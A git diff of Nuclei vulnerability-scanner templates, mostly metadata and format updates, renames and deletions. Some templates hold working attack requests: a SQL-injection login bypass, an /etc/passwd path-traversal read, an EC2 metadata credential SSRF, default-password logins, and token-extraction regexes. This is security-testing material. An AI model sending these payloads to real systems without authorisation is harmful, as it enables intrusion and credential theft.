{{BaseURL}} - - attack: pitchfork - payloads: - username: - - admin - password: - - alphaadmin - - matchers-condition: and - matchers: - - type: word - words: - - "HW Configuration" - - "SW Configuration" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/alumni-management-sqli.yaml b/nuclei-templates/Other/alumni-management-sqli.yaml index 6aa3ed4678..44822a70d5 100644 --- a/nuclei-templates/Other/alumni-management-sqli.yaml +++ b/nuclei-templates/Other/alumni-management-sqli.yaml @@ -11,24 +11,24 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2020-29214 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 + metadata: + max-request: 2 tags: sqli,auth-bypass,cms,edb,alumni -requests: +http: - raw: - | POST /admin/ajax.php?action=login HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - username=admin'+or+'1'%3D'1'%23&password=nuclei - + username=admin'+or+'1'%3D'1'%23&password={{rand_base(5)}} - | GET /admin/index.php?page=home HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -47,5 +47,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/09/28 +# digest: 4a0a004730450220018fffbf6de668d89ce9eae82ff88200d531cabc845740af0c3935c175085b19022100c586ae602b1ded9e02d5a925b3c1dcdd0c9e94b45e6c2335c2134957ee77448c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/amazon-account-id.yaml b/nuclei-templates/Other/amazon-account-id.yaml index 01ffd5b250..0ca716b7c6 100644 --- a/nuclei-templates/Other/amazon-account-id.yaml +++ b/nuclei-templates/Other/amazon-account-id.yaml @@ -13,7 +13,8 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: aws,amazon,token,file + tags: file,keys,aws,amazon,token + file: - extensions: - all @@ -25,4 +26,4 @@ file: - '(?i)aws_?(?:account)_?(?:id)?["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})' # Enhanced by md on 2023/05/04 -# digest: 490a0046304402204cdf5ae5eafb194436533d3bd5d707d3ed6e82bde669a90a33d3d6e7f841a4f1022016cc2daac84b2c82e2566fd7f5c68b83f2f1cbf93a5a19d259ac963a0ac330d0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ad930551f3063ad8ee7027d7e0af408452b42a4dc33ba7a99e5bcbcf845c7e05022100b1d4fcc47c2ae007d17b06c945a91c56d8f4f5166d69688d8707bc4fcb69266e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/amazon-docker-config.yaml b/nuclei-templates/Other/amazon-docker-config-280.yaml similarity index 100% rename from nuclei-templates/Other/amazon-docker-config.yaml rename to nuclei-templates/Other/amazon-docker-config-280.yaml diff --git a/nuclei-templates/Other/amazon-ec2-detect.yaml b/nuclei-templates/Other/amazon-ec2-detect.yaml index 1fa0949efb..1f89e63f10 100644 --- a/nuclei-templates/Other/amazon-ec2-detect.yaml +++ b/nuclei-templates/Other/amazon-ec2-detect.yaml @@ -6,10 +6,11 @@ info: severity: info metadata: verified: true + max-request: 1 shodan-query: "Server: EC2ws" tags: tech,aws,ec2,amazon -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -19,3 +20,5 @@ requests: part: header words: - "Server: EC2ws" + +# digest: 490a00463044022038c3707c1de6f7d7e9ba67bcbd20bdbe0325a5f9385ab29a96674f860f7b627c0220785363c27ef7b0583a9c77c677b979794645b1776b39ecd9905bb0999d00470d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/amazon-ec2-ssrf.yaml b/nuclei-templates/Other/amazon-ec2-ssrf.yaml index 0162dbc5bb..261f80cc17 100644 --- a/nuclei-templates/Other/amazon-ec2-ssrf.yaml +++ b/nuclei-templates/Other/amazon-ec2-ssrf.yaml @@ -4,16 +4,18 @@ info: name: Amazon EC2 - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical + description: SSRF vulnerability exists in Amazon EC2, or Amazon Elastic Compute Cloud which is a web service provided by Amazon Web Services (AWS) that offers resizable compute capacity in the cloud. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 metadata: verified: true + max-request: 2 shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon -requests: +http: - raw: - |+ GET {{BaseURL}}/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance HTTP/1.1 @@ -26,6 +28,7 @@ requests: stop-at-first-match: true unsafe: true + matchers-condition: and matchers: - type: word @@ -38,3 +41,4 @@ requests: - type: status status: - 200 +# digest: 4b0a004830460221009f819ee1784d9fae5ec437af8582ba3ae0acdfec4fc0f17a406484bc5b571ca4022100f9eddb7733eeabc5bda330300d5f5906a4e407c981433a6da41ec854e6a00864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/amazon-mws-auth-token-11845.yaml b/nuclei-templates/Other/amazon-mws-auth-token-11845.yaml new file mode 100755 index 0000000000..7014b6572f --- /dev/null +++ b/nuclei-templates/Other/amazon-mws-auth-token-11845.yaml @@ -0,0 +1,17 @@ +id: amazon-mws-auth-token-value + +info: + author: puzzlepeaches + name: "Amazon MWS Auth Token" + severity: medium + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/amazon-mws-auth-token-value.yaml b/nuclei-templates/Other/amazon-mws-auth-token-value.yaml deleted file mode 100644 index 0ab5703b9c..0000000000 --- a/nuclei-templates/Other/amazon-mws-auth-token-value.yaml +++ /dev/null @@ -1,16 +0,0 @@ -id: amazon-mws-auth-token-value - -info: - name: Amazon MWS Auth Token - author: gaurang - severity: medium - tags: token,file,amazon,auth - -file: - - extensions: - - all - - extractors: - - type: regex - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/amazon-mws-auth-token-283.yaml b/nuclei-templates/Other/amazon-mws-auth-token.yaml similarity index 100% rename from nuclei-templates/Other/amazon-mws-auth-token-283.yaml rename to nuclei-templates/Other/amazon-mws-auth-token.yaml diff --git a/nuclei-templates/Other/amazon-session-token.yaml b/nuclei-templates/Other/amazon-session-token.yaml index 8a6529f2b4..4d886ded5b 100644 --- a/nuclei-templates/Other/amazon-session-token.yaml +++ b/nuclei-templates/Other/amazon-session-token.yaml @@ -13,7 +13,8 @@ info: cwe-id: CWE-200 metadata: verified: true - tags: aws,amazon,token,file,session + tags: file,keys,aws,amazon,token,session + file: - extensions: - all @@ -25,4 +26,4 @@ file: - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)["''`]?\s{0,30}(?::|=>|=)\s{0,30}["''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]' # Enhanced by md on 2023/05/04 -# digest: 490a00463044022042bbced45aee0d6943da5aac1efe8367af4c8d494a624bf45d428530a6fcba6e02204537fb05ae1ae72607f23bf06b9c8e0d20b917ba425905e80ce47cc7835d0a70:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022012a50d46848dcc172a05c5e2fd88e802af8022bf13ab09dbf8740ae3ad5855f5022100c16953404125451a8cfc4ed26412b99b0d25c02e73a6c7ba8337a905c7e2efa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ambari-default-login-287.yaml b/nuclei-templates/Other/ambari-default-login-287.yaml new file mode 100644 index 0000000000..e251839b56 --- /dev/null +++ b/nuclei-templates/Other/ambari-default-login-287.yaml @@ -0,0 +1,26 @@ +id: ambari-default-login + +info: + name: Apache Ambari Default Login + author: pdteam + severity: medium + tags: ambari,default-login,apache + +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and diff --git a/nuclei-templates/Other/ambari-default-login-290.yaml b/nuclei-templates/Other/ambari-default-login-290.yaml deleted file mode 100644 index 7d9efa4734..0000000000 --- a/nuclei-templates/Other/ambari-default-login-290.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: ambari-default-login - -info: - name: Apache Ambari Default Login - author: pdteam - description: An Apache Ambari default admin login was discovered. - severity: high - reference: - - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: ambari,default-login,apache - -requests: - - raw: - - | - GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/ambari-exposure-294.yaml b/nuclei-templates/Other/ambari-exposure-291.yaml similarity index 100% rename from nuclei-templates/Other/ambari-exposure-294.yaml rename to nuclei-templates/Other/ambari-exposure-291.yaml diff --git a/nuclei-templates/Other/amcrest-login-297.yaml b/nuclei-templates/Other/amcrest-login-297.yaml deleted file mode 100644 index 19837aca9a..0000000000 --- a/nuclei-templates/Other/amcrest-login-297.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: amcrest-login - -info: - name: Amcrest Login - author: DhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/7273 - metadata: - shodan-query: html:"amcrest" - google-dork: intext:"amcrest" "LDAP User" - tags: panel,camera,amcrest - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - words: - - "Amcrest Technologies" - - "LDAPUser" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/amcrest-login.yaml b/nuclei-templates/Other/amcrest-login.yaml new file mode 100644 index 0000000000..1c2714211b --- /dev/null +++ b/nuclei-templates/Other/amcrest-login.yaml @@ -0,0 +1,34 @@ +id: amcrest-login + +info: + name: Amcrest Login + author: DhiyaneshDK + severity: info + description: An Amcrest LDAP user login was discovered. + reference: + - https://www.exploit-db.com/ghdb/7273 + classification: + cwe-id: CWE-200 + metadata: + shodan-query: html:"amcrest" + google-dork: intext:"amcrest" "LDAP User" + tags: panel,camera,amcrest + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - "Amcrest Technologies" + - "LDAPUser" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml b/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml index f9fc49bd56..fc4889c7bd 100644 --- a/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml +++ b/nuclei-templates/Other/amministrazione-aperta-lfi-303.yaml @@ -1,15 +1,22 @@ id: amministrazione-aperta-lfi info: - name: Amministrazione Aperta 3.7.3 - Unauthenticated Local File Read + name: WordPress Amministrazione Aperta 3.7.3 - Local File Inclusion author: daffainfo,Splint3r7 severity: high + description: WordPress Amministrazione Aperta 3.7.3 is vulnerable to local file inclusion. reference: - https://www.exploit-db.com/exploits/50838 - https://wordpress.org/plugins/amministrazione-aperta - tags: wordpress,wp-plugin,lfi,wp + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + metadata: + max-request: 1 + tags: wp-plugin,lfi,wp,edb,wordpress -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd' @@ -23,3 +30,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a004730450220483f16724935dcc058e8021d5b6eed5abd21252eecf528ed52a6c648c2fcc138022100a6df64050b8681607c16b6684dc3344056e6838828fd12baf1f99be86c95fc13:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/amp-application-panel.yaml b/nuclei-templates/Other/amp-application-panel.yaml index 5db160e1fa..ffbe2c2331 100644 --- a/nuclei-templates/Other/amp-application-panel.yaml +++ b/nuclei-templates/Other/amp-application-panel.yaml @@ -7,21 +7,23 @@ info: description: Application Management Panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:cubecoders:amp:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 1 + product: amp shodan-query: title:"AMP - Application Management Panel" - tags: panel,amp + vendor: cubecoders + verified: true + tags: panel,amp,cubecoders -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and matchers: - - type: word words: - "AMP - Application Management Panel" @@ -30,5 +32,4 @@ requests: part: header words: - "text/html" - -# Enhanced by md on 2022/10/31 +# digest: 490a00463044022001f279a936bf2746faf11df9f5e6c7ec5dfcb230319b17e97649696af44561f602203d4cd614cdc13e7c5718cc1e8c9fad14b631666ee55b676a4c32c4365b3ed320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/amp.yaml b/nuclei-templates/Other/amp.yaml index 058f93549a..0dd8686ec3 100644 --- a/nuclei-templates/Other/amp.yaml +++ b/nuclei-templates/Other/amp.yaml @@ -11,7 +11,7 @@ info: wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 -requests: +http: - method: GET path: diff --git a/nuclei-templates/Other/ampache-debug.yaml b/nuclei-templates/Other/ampache-debug.yaml index fa4eccf37e..733132b6f9 100644 --- a/nuclei-templates/Other/ampache-debug.yaml +++ b/nuclei-templates/Other/ampache-debug.yaml @@ -6,10 +6,11 @@ info: severity: info metadata: verified: true + max-request: 2 shodan-query: http.title:"Ampache -- Debug Page" tags: misconfig,ampache,debug -requests: +http: - method: GET path: - '{{BaseURL}}' @@ -18,6 +19,7 @@ requests: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -28,3 +30,5 @@ requests: - type: status status: - 200 + +# digest: 490a0046304402204fc96c27b19ab1615ece4b327244a62166cee8f2f8aabd0a48dbefab8865984502201572545154f63f6bf6f67cbbdbc65d7a0e7b286b67fdcf4424c5e5c446cb48ff:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/ampache-music-installer.yaml b/nuclei-templates/Other/ampache-music-installer.yaml index 9b9edd61f2..053575bdf0 100644 --- a/nuclei-templates/Other/ampache-music-installer.yaml +++ b/nuclei-templates/Other/ampache-music-installer.yaml @@ -4,12 +4,14 @@ info: name: Ampache Music Installer author: tess severity: high + description: Ampache Music is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true + max-request: 1 shodan-query: title:"For the Love of Music - Installation" tags: misconfig,ampache,install,exposure -requests: +http: - method: GET path: - '{{BaseURL}}/install.php' @@ -31,3 +33,4 @@ requests: - type: status status: - 200 +# digest: 490a004630440220605ea50cd6b226cdbce1435b6626cd250bc67ac9f560eece87174fc44f6f93b20220135a1b12364086757ef627dd5560776ee8ba1cff657acf8cc6204cfb783bb52a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampache-panel.yaml b/nuclei-templates/Other/ampache-panel.yaml index db35771994..1efadb34ec 100644 --- a/nuclei-templates/Other/ampache-panel.yaml +++ b/nuclei-templates/Other/ampache-panel.yaml @@ -7,14 +7,17 @@ info: description: Ampache login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 cwe-id: CWE-200 + cpe: cpe:2.3:a:ampache:ampache:*:*:*:*:*:*:*:* metadata: - verified: true + max-request: 3 + product: ampache shodan-query: http.title:"For the Love of Music" + vendor: ampache + verified: true tags: panel,ampache -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -24,6 +27,7 @@ requests: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -41,5 +45,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/11/09 +# digest: 490a00463044022026ff670001f355854261f51aa9568db44aab6ef281df0e668e39bca7245c0c22022018267c7949b2c76dfc72631a00c2dc64303405e61e78e4c3e6ec00de060befbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampache-update-exposure.yaml b/nuclei-templates/Other/ampache-update-exposure.yaml index 4677d01b8c..0ced7ddb91 100644 --- a/nuclei-templates/Other/ampache-update-exposure.yaml +++ b/nuclei-templates/Other/ampache-update-exposure.yaml @@ -4,12 +4,14 @@ info: name: Ampache Update Page Exposure author: ritikchaddha severity: low + description: Ampache update page is exposed. metadata: verified: true + max-request: 1 shodan-query: http.html:"Ampache Update" tags: misconfig,ampache,exposure -requests: +http: - method: GET path: - "{{BaseURL}}/update.php" @@ -32,3 +34,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450221008c0739e4fd795e10d4e26b6443d2e7aaaca3f7a319581604454da0b81291e1da0220044cbd8795a1b1cae54923ff98d84c81e7d7aceb029169ab143825e7caa870f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampguard-wifi-setup.yaml b/nuclei-templates/Other/ampguard-wifi-setup.yaml index dcdc9f174d..66cd41b90e 100644 --- a/nuclei-templates/Other/ampguard-wifi-setup.yaml +++ b/nuclei-templates/Other/ampguard-wifi-setup.yaml @@ -4,12 +4,14 @@ info: name: AmpGuard Wifi Setup author: pussycat0x severity: info + description: AmpGuard wifi setup panel detected. metadata: - verified: "true" + verified: true + max-request: 1 shodan-query: title:"AmpGuard wifi setup" tags: ampguard,iot,setup,wifi -requests: +http: - method: GET path: - "{{BaseURL}}" @@ -24,3 +26,4 @@ requests: - type: status status: - 200 +# digest: 4b0a00483046022100d4a3cb12fcee3738ca5f49ef572ccb813ae3b2a4376c51ead505f958f5c6769c022100a3fda6aba76d72daa14a29577b2e82809ef414d063776383e5bb38fe7b9cef00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/ampps-admin-panel-306.yaml b/nuclei-templates/Other/ampps-admin-panel-305.yaml similarity index 100% rename from nuclei-templates/Other/ampps-admin-panel-306.yaml rename to nuclei-templates/Other/ampps-admin-panel-305.yaml diff --git a/nuclei-templates/Other/ampps-dirlisting.yaml b/nuclei-templates/Other/ampps-dirlisting-308.yaml similarity index 100% rename from nuclei-templates/Other/ampps-dirlisting.yaml rename to nuclei-templates/Other/ampps-dirlisting-308.yaml diff --git a/nuclei-templates/Other/ampps-panel-309.yaml b/nuclei-templates/Other/ampps-panel-309.yaml deleted file mode 100644 index 4a44ba9360..0000000000 --- a/nuclei-templates/Other/ampps-panel-309.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ampps-panel - -info: - name: AMPPS Login Panel - author: deFr0ggy - severity: info - description: An AMPPS login panel was detected. - classification: - cwe-id: CWE-200 - tags: panel,ampps,login - -requests: - - method: GET - path: - - "{{BaseURL}}/ampps/index.php?act=login" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Login' - - 'themes/default/images/ampps/favicon.ico' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-panel-310.yaml b/nuclei-templates/Other/ampps-panel-310.yaml new file mode 100644 index 0000000000..38d3d1d423 --- /dev/null +++ b/nuclei-templates/Other/ampps-panel-310.yaml @@ -0,0 +1,35 @@ +id: ampps-panel + +info: + name: AMPPS Login Panel + author: deFr0ggy + severity: info + tags: panel,ampps,login + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps/index.php?act=login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Login' + - 'themes/default/images/ampps/favicon.ico' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' diff --git a/nuclei-templates/Other/analytify-plugin-xss.yaml b/nuclei-templates/Other/analytify-plugin-xss.yaml index d4547f82d2..9c07ff965f 100644 --- a/nuclei-templates/Other/analytify-plugin-xss.yaml +++ b/nuclei-templates/Other/analytify-plugin-xss.yaml @@ -8,16 +8,17 @@ info: WordPress Analytify 4.2.1 does not escape the current URL before outputting it back in a 404 page when the 404 tracking feature is enabled, leading to reflected cross-site scripting. reference: - https://wpscan.com/vulnerability/b8415ed5-6fd0-42fe-9201-73686c1871c5 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cwe-id: CWE-80 metadata: verified: true + max-request: 1 google-query: inurl:/wp-content/plugins/wp-analytify - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cwe-id: CWE-79 tags: wp,wordpress,analytify,wpscan,wp-plugin,xss -requests: +http: - method: GET path: - '{{BaseURL}}/aa404bb?a' @@ -40,4 +41,4 @@ requests: status: - 404 -# Enhanced by mp on 2022/09/07 +# digest: 4b0a00483046022100e09cd2cb41d74201a55b08ad6c64761c1d0ddfc72a64f63eed0e6d886e298baf0221009e9e3ac9fbb67b006a5dca925a6426f863dc636facc5a7299b2e80d92b2edd0c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/anaqua-login-panel.yaml b/nuclei-templates/Other/anaqua-login-panel.yaml index 0c5a0ec6b9..910fd83a12 100644 --- a/nuclei-templates/Other/anaqua-login-panel.yaml +++ b/nuclei-templates/Other/anaqua-login-panel.yaml @@ -8,12 +8,11 @@ info: Checks for the presence of Anaqua login page classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 cwe-id: CWE-200 metadata: - verified: true max-request: 1 shodan-query: title:"Anaqua User Sign On"" + verified: true tags: anaqua,login,panel http: @@ -33,5 +32,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022060d150b256f40e43d6af397522ba3bbd382272d4d9eb1e0a051ff5991f287eac022100ec26375c36ddb970378b49e6bc3d54a8a4ece3d7343064fe43746bb9be38d497:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502201189396d086e2b7bb798f88291df48a4d16eeeb737952f35ad48a022999bf28a022100a648a6cd84fa8c2aa9da5a3477b096fd0e71be1224ee429dff3c0c86676d824a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/android-debug-database-exposed-312.yaml b/nuclei-templates/Other/android-debug-database-exposed-312.yaml deleted file mode 100644 index 669be2723a..0000000000 --- a/nuclei-templates/Other/android-debug-database-exposed-312.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: android-debug-database-exposed - -info: - name: Android Debug Manager - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 - tags: unauth,android - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Android Debug Database' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/android-debug-database-exposed.yaml b/nuclei-templates/Other/android-debug-database-exposed.yaml new file mode 100644 index 0000000000..94bf98c494 --- /dev/null +++ b/nuclei-templates/Other/android-debug-database-exposed.yaml @@ -0,0 +1,24 @@ +id: android-debug-database-exposed + +info: + name: Android Debug Manager + author: dhiyaneshDK + severity: low + reference: + - https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 + tags: unauth,android + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Android Debug Database' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/andromeda-malware.yaml b/nuclei-templates/Other/andromeda-malware.yaml index 64c7732254..95fafe77ee 100644 --- a/nuclei-templates/Other/andromeda-malware.yaml +++ b/nuclei-templates/Other/andromeda-malware.yaml @@ -6,7 +6,6 @@ info: severity: info reference: https://github.com/Yara-Rules/rules/blob/master/malware/MALW_Andromeda.yar tags: malware,file - file: - extensions: - all @@ -20,4 +19,6 @@ file: - type: binary binary: - - "1C1C1D03494746" \ No newline at end of file + - "1C1C1D03494746" + +# digest: 490a0046304402201778cf53991884f7b29706930aec0f8acfce69528e080663a436bdba0b42546a0220636a9eee01a609195564a9f19c89721357a20d1b3460d1beeff7b33b961c74b0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/angular-client-side-template-injection.yaml b/nuclei-templates/Other/angular-client-side-template-injection.yaml index 6e666f4aa4..98993c6b07 100644 --- a/nuclei-templates/Other/angular-client-side-template-injection.yaml +++ b/nuclei-templates/Other/angular-client-side-template-injection.yaml @@ -4,10 +4,16 @@ info: name: Angular Client-side-template-injection author: theamanrawat severity: high + description: | + Detects Angular client-side template injection vulnerability. + impact: | + May lead to remote code execution or sensitive data exposure. + remediation: | + Sanitize user inputs and avoid using user-controlled data in template rendering. reference: - https://www.acunetix.com/vulnerabilities/web/angularjs-client-side-template-injection/ - https://portswigger.net/research/xss-without-html-client-side-template-injection-with-angularjs - tags: angular,csti,dast + tags: angular,csti,dast,headless,xss variables: first: "{{rand_int(1000, 9999)}}" @@ -19,6 +25,7 @@ headless: - action: navigate args: url: "{{BaseURL}}" + - action: waitload payloads: @@ -37,3 +44,4 @@ headless: part: body words: - "{{result}}" +# digest: 4a0a00473045022100adfe788d650a997bddf7f4876f1308a9d1ea62d43e7b90abca139f455492d4e902203223d59aac1aa4374770127adface5ccebfd4a4dc8fdfef8b240578bf7b6df72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/angular-detect.yaml b/nuclei-templates/Other/angular-detect.yaml index 751e4ff138..ee01efcaa1 100644 --- a/nuclei-templates/Other/angular-detect.yaml +++ b/nuclei-templates/Other/angular-detect.yaml @@ -9,16 +9,16 @@ info: - https://github.com/angular/angular metadata: verified: true + max-request: 1 shodan-query: html:"ng-version=" tags: tech,angular -requests: +http: - method: GET path: - "{{BaseURL}}" matchers-condition: and - matchers: - part: body type: word @@ -30,3 +30,5 @@ requests: group: 1 regex: - 'ng-version="([0-9.]+)"' + +# digest: 4b0a00483046022100c27e4418203c86638e6e00c792093e221ffdaf641129125c28ae3fa6c59fc6c3022100a0584f76ff9fb8e7cd13351c2f8856ad173adf6bd7a6bff20c88e8c0ca0a80ef:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/angular-json.yaml b/nuclei-templates/Other/angular-json.yaml index 4288841af0..dd588d3b8a 100644 --- a/nuclei-templates/Other/angular-json.yaml +++ b/nuclei-templates/Other/angular-json.yaml @@ -6,12 +6,13 @@ info: severity: info metadata: verified: true + max-request: 4 shodan-query: - html:"angular.json" - html:"angular-cli.json" tags: exposure,angularjs,files -requests: +http: - method: GET path: - "{{BaseURL}}/.angular-cli.json" @@ -20,6 +21,7 @@ requests: - "{{BaseURL}}/.angular.json" stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -37,3 +39,5 @@ requests: - type: status status: - 200 + +# digest: 4a0a00473045022100a17e551eb0d7282c84cbe80752cfc5cd8bb2cc4bcd1f57210bd3bf8090ff884702203cbb81aa88602b99846e1c74c29e3bcb1ee3d64cf681d7d54f4fda618fc037b0:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/anima-takeover.yaml b/nuclei-templates/Other/anima-takeover-317.yaml similarity index 100% rename from nuclei-templates/Other/anima-takeover.yaml rename to nuclei-templates/Other/anima-takeover-317.yaml diff --git a/nuclei-templates/Other/Anni-fileDownload.yaml b/nuclei-templates/Other/anni-filedownload.yaml similarity index 100% rename from nuclei-templates/Other/Anni-fileDownload.yaml rename to nuclei-templates/Other/anni-filedownload.yaml diff --git a/nuclei-templates/Other/announcekit-takeover-322.yaml b/nuclei-templates/Other/announcekit-takeover-324.yaml similarity index 100% rename from nuclei-templates/Other/announcekit-takeover-322.yaml rename to nuclei-templates/Other/announcekit-takeover-324.yaml diff --git a/nuclei-templates/Other/ansible-awx-detect.yaml b/nuclei-templates/Other/ansible-awx-detect.yaml index c777d338dd..45b7f5da8d 100644 --- a/nuclei-templates/Other/ansible-awx-detect.yaml +++ b/nuclei-templates/Other/ansible-awx-detect.yaml @@ -9,10 +9,11 @@ info: - https://github.com/ansible/awx metadata: verified: true + max-request: 1 shodan-query: html:'Select a frequency for snapshot retention' tags: tech,ansible,awx -requests: +http: - method: GET path: - "{{BaseURL}}/api/" @@ -27,3 +28,5 @@ requests: - type: status status: - 200 + +# digest: 